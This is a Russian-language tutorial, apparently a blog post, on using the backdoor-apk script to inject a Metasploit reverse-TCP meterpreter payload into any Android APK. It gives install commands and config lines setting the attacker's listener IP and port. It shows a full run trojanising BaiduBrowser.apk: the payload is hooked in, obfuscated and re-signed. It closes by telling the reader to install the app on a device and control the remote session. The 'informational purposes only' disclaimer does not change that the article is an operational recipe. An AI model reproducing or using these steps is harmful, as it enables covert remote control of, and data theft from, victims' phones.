Добавляем бэкдор в любой APK файл для Android
Статья исключительно в ознакомительных целях и не призывает к действиям!
В сегодняшней статье я расскажу вам о скрипте backdoor-apk
backdoor-apk – это шелл скрипт, который упрощает процесс добавления бэкдора в любой APK файл для Android.
Программа поставляется со сторонними компонентами android-sdk-linux, apktool и proguard5.2.1.
Страница на GutHub: https://github.com/dana-at-cp/backdoor-apk
Установка в Kali Linux
sudo apt-get install lib32stdc++6 lib32ncurses5 lib32z1 git clone https://github.com/dana-at-cp/backdoor-apk.git cd backdoor-apk
Справка
Использование:
./backdoor-apk.sh оригинальный.apk
У программы как таковой справки нет и есть только одна опция– имя первоначального файла APK, в который будет зашит бэкдор. Изменить настройки вы можете в первых строках файла backdoor-apk.sh. В них вы можете задать IP адрес и порт для связи с Metasploit, пути до сторонних модулей, имя «файла-крысы», путь до лога и некоторые другие опции:
MSFVENOM=msfvenom LHOST="10.6.9.31" LPORT="1337" DEX2JAR=d2j-dex2jar APKTOOL=third-party/apktool/apktool PROGUARD=third-party/proguard5.2.1/lib/proguard DX=third-party/android-sdk-linux/build-tools/23.0.3/dx MY_PATH=`pwd` ORIG_APK_FILE=$1 RAT_APK_FILE=Rat.apk LOG_FILE=$MY_PATH/run.log
Пример запуска скрипта
Внедрить бэкдор в APK файл (BaiduBrowser.apk):
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk [*] Generating reverse tcp meterpreter payload...done. [+] Handle the meterpreter connection at: 10.6.9.31:1337 [*] Decompiling RAT APK file...done. [*] Decompiling original APK file...done. [*] Merging permissions of original and payload projects...done. [*] Running proguard on RAT APK file...done. [*] Decompiling obfuscated RAT APK file...done. [*] Creating new directories in original project for RAT smali files...done. [*] Copying RAT smali files to new directories in original project...done. [*] Fixing RAT smali files...done. [*] Locating smali file to hook in original project...done. [*] Adding hook in original smali file...done. [*] Recompiling original project with backdoor...done. [*] Signing recompiled APK...done. root@kali:~/Android/evol-lab/BaiduBrowserRat#
Перекомпилированный APK вы найдёте в директории 'original/dist'. Установите этот APK на совместимое устройство Android, запустите его, и управляйте подключением meterpreter на указанном IP и порту.